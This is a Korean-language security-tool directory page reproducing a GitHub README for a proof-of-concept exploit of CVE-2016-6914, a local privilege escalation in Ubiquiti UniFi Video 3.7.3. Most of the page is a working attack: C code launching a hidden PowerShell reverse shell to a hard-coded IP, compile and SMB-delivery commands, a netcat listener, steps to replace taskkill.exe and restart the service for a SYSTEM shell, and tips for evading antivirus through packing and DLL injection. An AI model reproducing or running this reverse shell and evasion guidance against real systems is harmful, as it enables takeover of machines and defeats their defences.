Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2016-6914-UniFiVideo-LPE — CVE-2016-6914-UniFiVideo-LPE | Kitploit
도구/GitHubGitHub/cybermonkx/cve-2016-6914-unifivideo-lpe
Privilege EscalationExploitationPenetration TestingLearning & EducationPayload DevelopmentBinary Exploitation
GitHubcybermonkx/cve-2016-6914-unifivideo-lpe

CVE-2016-6914-UniFiVideo-LPE

CVE-2016-6914-UniFiVideo-LPE

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유
저장소 보기
21년 전아직 검토되지 않음

CVE-2016-6914 - Ubiquiti UniFi Video 3.7.3 LPE PoC

🔥 개요

이 저장소는 Ubiquiti UniFi Video 3.7.3에 영향을 미치는 로컬 권한 상승(LPE) 취약점인 CVE-2016-6914에 대한 **개념 증명(PoC)**을 포함합니다.

낮은 권한을 가진 공격자는 C:\ProgramData\unifi-video\ 안에 있는 신뢰할 수 있는 바이너리(taskkill.exe)를 교체하여 SYSTEM 권한으로 악성 코드를 실행할 수 있습니다.


⚡ 익스플로잇

악용 단계

1️⃣ taskkill.exe를 악성 페이로드(exploit.exe)로 교체합니다.
2️⃣ UniFi Video Service가 실행될 때까지 기다리거나 수동으로 재시작합니다.
3️⃣ 악성 페이로드가 실행되어 SYSTEM 셸을 획득합니다.


🚀 포함된 페이로드

  • ✅ PowerShell 리버스 셸
  • ✅ Netcat 리버스 셸
  • ✅ AV 우회 기술

📜 PoC 코드 (PowerShell 리버스 셸)

이 페이로드는 taskkill.exe를 교체하고 리버스 셸을 실행합니다.

root@kitploit:~
#include <windows.h>

int main() {
    system("powershell -NoP -W Hidden -c \"$client = New-Object System.Net.Sockets.TCPClient('10.10.16.5',4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close();\"");
    return 0;
}
✅ MinGW를 사용하여 컴파일:
x86_64-w64-mingw32-gcc exploit.c -o exploit.exe
🛠️ 사용 방법
1️⃣ SMB 공유 설정 (원격 파일 전달용)
Kali에서 실행:
impacket-smbserver share . -smb2support
2️⃣ Netcat 리스너 시작
nc -lvnp 4444
3️⃣ 대상 시스템에 페이로드 전달
대상 시스템에서 다음 PowerShell 명령을 실행합니다:
copy \\10.10.14.5\share\taskkill.exe C:\ProgramData\unifi-video\taskkill.exe
stop-service UnifiVideoService -Force
start-service UnifiVideoService
4️⃣ SYSTEM 셸 획득
실행되면 리스너에 SYSTEM 셸이 열립니다!

🛡️ 안티바이러스(AV) 우회
기본 AV 탐지를 회피하려면 다음을 시도하십시오:
✔️ 실행 파일 패킹 (UPX):
upx --best --lzma exploit.exe
✔️ system() 대신 대체 Syscall 사용.
✔️ DLL 인젝션을 사용하여 합법적인 프로세스에 삽입.

⚠️ 면책 조항
📢 이 PoC는 교육 목적으로만 제공됩니다!
🛑 무단 사용은 불법이며 처벌받을 수 있습니다.
👨‍💻 합법적이고 윤리적인 방법으로만 사용하십시오.

참고: https://www.exploit-db.com/exploits/43390
도구 다운로드